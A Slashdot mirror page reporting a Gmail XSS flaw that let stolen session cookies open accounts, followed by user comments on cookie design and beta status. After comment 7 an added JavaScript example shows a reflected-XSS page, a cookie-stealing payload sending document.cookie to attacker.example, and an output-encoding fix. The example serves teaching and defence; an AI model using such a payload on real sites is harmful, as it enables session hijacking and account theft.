Slashdot Mirror


Gmail Accounts Vulnerable to XSS Exploit

mallumax writes "A security hole in GMail has been found (an XSS vulnerability) which allows access to user accounts without authentication. What makes the exploit worse is the fact that changing passwords doesn't help. The full details of the exploit haven't been disclosed. The vulnerability was reported by Israeli news site Nana. They were tipped off by an Israeli hacker. Google has been notified and they are working to close the hole. The Register has the story here."

20 of 232 comments

  1. Oh no! by scaaven · · Score: 5, Funny

    My google stock. My poor google stock!

    --
    I know I'm going to be modded up on this
  2. Google needs to toss its cookies... by LostCluster · · Score: 5, Informative

    The articles reveal that the basic design of the bug is to snatch the victim's cookie, and then the hacker can use that cookie to get into the account forever more. That cookie will always lead to the victim's account no matter what... even if they log out, even if they change their password, the cookie will still be valid authentication.

    The XSS part is just an example of a way to steal the user's cookie. Clearly, any other way you can think of to grab a cookie file would work just as well.

    It's a surprisingly bad design by Google standards. By assigning a forever-good cookie value to each user's account, it eliminates the need to re-login at home after using GMail at a public terminal, but the problem is if that cookie value ever falls into enemy hands the account is compromised and cannot be re-secured. Re-assigning the cookie value at each logon is the more traditional way of securing such things, although that means users who hop between more than one computer or even browser would have to re-authenticate every time they changed.

    1. Re:Google needs to toss its cookies... by LostCluster · · Score: 5, Informative

      The cookie file gets invalidated... but the problem is if you log back in, instead of getting a new value in your new cookie, apparently you get the same old value again. And worse yet, even if you don't log in again, bringing back that old cookie from the dead is all that's needed to log in.

      It's not the expiration date on the cookie that's the problem, it's the fact that their database still associates "your cookie" with your account even if there's no authorized cookie in circulation.

    2. Re:Google needs to toss its cookies... by kinema · · Score: 5, Informative

      What I don't like about it is that it doesn't use SSL after you log in.

      Actually if you enter "https://gmail.google.com/gmail" in the location bar of your favorite browser you will continue to use an SSL secured connection for the duration of your session.
  3. Oh my god! by Zangief · · Score: 5, Funny

    Maybe some hacker will make a program to break into every gmail account, read their mail, and send them ads about what people are talking about in mails!!!

  4. sweet grapes by yahyamf · · Score: 5, Funny

    I waited so long to get a Gmail account, I don't care if it sucks now... I also like Doom3...

  5. I must do my part to help. by teamhasnoi · · Score: 5, Funny

    The first person to fix the exploit will get a FREE GMAIL INVITE!

  6. PSA: XSS cookie theft by whovian · · Score: 5, Informative

    Never heard of XSS until now (like me)? Here is one summary of what the cookie theft looks like.

    --
    To-do List: Receive telemarketing call during a tornado warning. Check.
  7. Need more than just the username by Dominic_Mazzoni · · Score: 5, Informative

    I may be misinterpreting the story, but it sounds to me like you need more than just the username: you need to actually trick the user into giving you their GMail cookie by phishing. Obviously, this is a huge security hole and Google should fix it immediately, but it's not quite the same as the Hotmail backdoor from last year, which didn't require phishing at all. As long as you don't ever click on a link that sends you to GMail from an untrusted source, you should be safe.

    1. Re:Need more than just the username by poot_rootbeer · · Score: 5, Insightful

      you need to actually trick the user into giving you their GMail cookie by phishing.

      ...or by grabbing the cookies left behind by previous users off a public terminal.

      But that's a minor concern, no one ever uses a public computing terminal to check webmail, or walks away without logging out properly.
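The cookie theft that comments 6 and 7 refer to, as an added example that is not part of the original thread and is not Gmail's code: a page that reflects a query parameter unescaped, the link an attacker would send, and the same page with output encoding. The site name "mail.example", the parameter "q", the attacker host "attacker.example" and the cookie value are all constructed for the illustration; the "browser" is a stand-in that only executes the one exfiltration idiom the payload uses.

```javascript
// Added example, not Gmail's code: a reflected XSS that turns a crafted link
// into cookie theft, beside the output encoding that stops it. The site
// "mail.example", the parameter "q", the attacker host "attacker.example"
// and the cookie value are all constructed for this illustration.

// The session cookie the victim's browser holds for the site (constructed).
const VICTIM_COOKIE = "SID=0123456789abcdef";

// Vulnerable: the search term is copied into the page as raw HTML.
function renderSearchVulnerable(query) {
  return `<html><body><h1>Results for ${query}</h1></body></html>`;
}

// Hardened: encode the characters that can end the text context.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderSearchFixed(query) {
  return `<html><body><h1>Results for ${escapeHtml(query)}</h1></body></html>`;
}

// The attacker's payload: if the page executes it, the browser fetches an
// image from the attacker's host with document.cookie in the URL.
const PAYLOAD =
  '<script>new Image().src="http://attacker.example/c?"+encodeURIComponent(document.cookie)</script>';

// The link the victim is tricked into following (the phishing step in comment 7).
function craftLink(payload) {
  const u = new URL("http://mail.example/search");
  u.searchParams.set("q", payload);
  return u.toString();
}

// A crude stand-in for the victim's browser: it finds inline scripts and
// "runs" only the one exfiltration idiom used by PAYLOAD, returning the
// outbound requests the attacker would see.
function simulateBrowser(html, cookie) {
  const requests = [];
  for (const m of html.matchAll(/<script>([\s\S]*?)<\/script>/gi)) {
    const exfil = /new Image\(\)\.src="([^"]+)"\+encodeURIComponent\(document\.cookie\)/.exec(m[1]);
    if (exfil) requests.push(exfil[1] + encodeURIComponent(cookie));
  }
  return requests;
}

// End to end: victim follows the link, the server renders the page, the
// browser loads it. Returns the list of requests leaking to the attacker.
function leakedRequests(render) {
  const link = craftLink(PAYLOAD);
  const query = new URL(link).searchParams.get("q"); // what the server receives
  return simulateBrowser(render(query), VICTIM_COOKIE);
}

console.log("vulnerable:", leakedRequests(renderSearchVulnerable));
console.log("fixed:     ", leakedRequests(renderSearchFixed));
```

Two caveats a practitioner would add: encoding for HTML text context is not enough if the value is reflected into an attribute, a URL or a script block, each of which needs its own encoding; and a cookie set with the HttpOnly flag is not readable through document.cookie, which blocks this particular exfiltration but does nothing about the server-side design problem LostCluster describes in comment 2.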

  8. Good thing they are still in beta. by bill_kress · · Score: 5, Funny

    They caught this problem in beta, just as should be done! Bravo!

    Brings some true professionalism to an industry where companies actually ship/sell products with bugs like this all the time.

  9. Re:XSS isn't that big a deal by phasm42 · · Score: 5, Interesting

    XSS is not the real problem here. The real problem is that the cookie can be used to authenticate an account. If you get a copy of the cookie and take it to another machine, you could log on using that cookie, even after the cookie has expired. This is a poor design, and XSS is just one way to exploit this. Another would be to simply copy Mozilla's cookies.txt file, or whatever browser you use. Or to sniff out the cookie over the network and use it from then on.

    --
    "No one likes working in a hamster wheel, and your shop smells of cedar shavings from here." - TaleSpinner
  10. Re:it IS a beta... by buzzini · · Score: 5, Insightful

    Labeling something "beta" almost indefinitely should not be a get-out-of-jail-free card. It seems to me that once a product is in fairly widespread use -- once a product has a marketing plan behind it -- saying "no fair, it's a beta!" is a little disingenuous.

  11. Easy Fix: by thesandtiger · · Score: 5, Insightful

    1) Gmail plugs the hole.

    2) They change the cookie validation test script in this case to require a different cookie than ones that were being given while the exploit was active.

    3) When a counterfeit cookie (or any of the old cookies) tries to validate it's immediately seen as invalid, and the user is then made to login.

    Of course, if someone already got at your stuff, well, that's bad.

    --
    Since I can't tell them apart, I treat all ACs as the same person.
  12. Wives by mekanizer · · Score: 5, Funny

    Time to read our wives' e-mail to see if they are cheating or something.

  13. Re:I got it by Anonymous Coward · · Score: 5, Funny

    Yeah, I agree. Your gmail account is the best mail I've ever used.

    - Anonymous Cookie monster

  14. Re:Now everybody, not just Google, can read your ema by iMaple · · Score: 5, Funny

    what's the difference if a few Hackers get a hold of your account?

    You know it's not just as simple as you think. I mean I don't care if a few hackers read my email, but what if they decide to use sensitive info in it or delete it.

    I run an e-business from Nigeria and earn some money in the process. People email me their bank account numbers, credit card numbers, SSNs and what not (I am creative). Now if some immoral hacker got hold of that data, the poor users would be duped twice, and I would feel really bad about it (I mean I could have got twice the money myself if I wanted). So I request Gmail to help the Nigerian revolution and our fight against AIDS and dictators and fix the bug as soon as possible.

  15. Re:it IS a beta... by RetroGeek · · Score: 5, Informative

    Beta should be reserved for functionality, GUI, and interoperability issues.

    No that is alpha. Once all the functionality is complete, the GUI has been approved, and the application can talk to the other applications it needs to, THEN the product goes into beta testing.

    Beta is there to locate any bugs which made it past the alpha testers. Beta apps are considered feature complete.

    --

    - - - - - - - - - - -
    I am a programmer. I am paid to produce syntax not grammar. Deal with it.
  16. Re:it IS a beta... by WIAKywbfatw · · Score: 5, Insightful

    Care to explain what marketing plan for Gmail you've seen? So far, Google has issued a couple of press releases - announcing its intention to offer email services, etc - but nothing more than that, and it's made it repeatedly clear that the service is in beta.

    Have you ever seen more than that? Have you seen any advertising (banner or otherwise) for the service? Just how do you contend that Google is marketing it?

    And how the hell are you defining "fairly widespread use"? Just how many Gmail accounts do you think there are? 100,000? A million? Well, in comparison, how many Microsoft Hotmail or Yahoo Mail accounts do you think there are out there? I'd be surprised if Gmail had even a hundredth of the user base that its key competitors possess.

    Gmail is in beta. Until they say it's not in beta please accept that nothing should be taken for granted. And the fact is that even "shipped" products aren't error free, so either learn to accept that things sometimes go wrong with software or just stop using a PC altogether.

    --

    "Accept that some days you are the pigeon, and some days you are the statue." - David Brent, Wernham Hogg
  17. Gmail just logged me out - a quickfix already? by adnonsense · · Score: 5, Interesting

    I was using the "don't ask my password for two weeks" feature - Gmail just logged me out although the two weeks aren't up, and after logging in again I had a session ID tacked on to the URL like this:

    http://gmail.google.com/gmail?_sgh=2f3ab242adinfinitum

    which I've never seen before.

    I think it'll be a long Friday night at the 'Plex.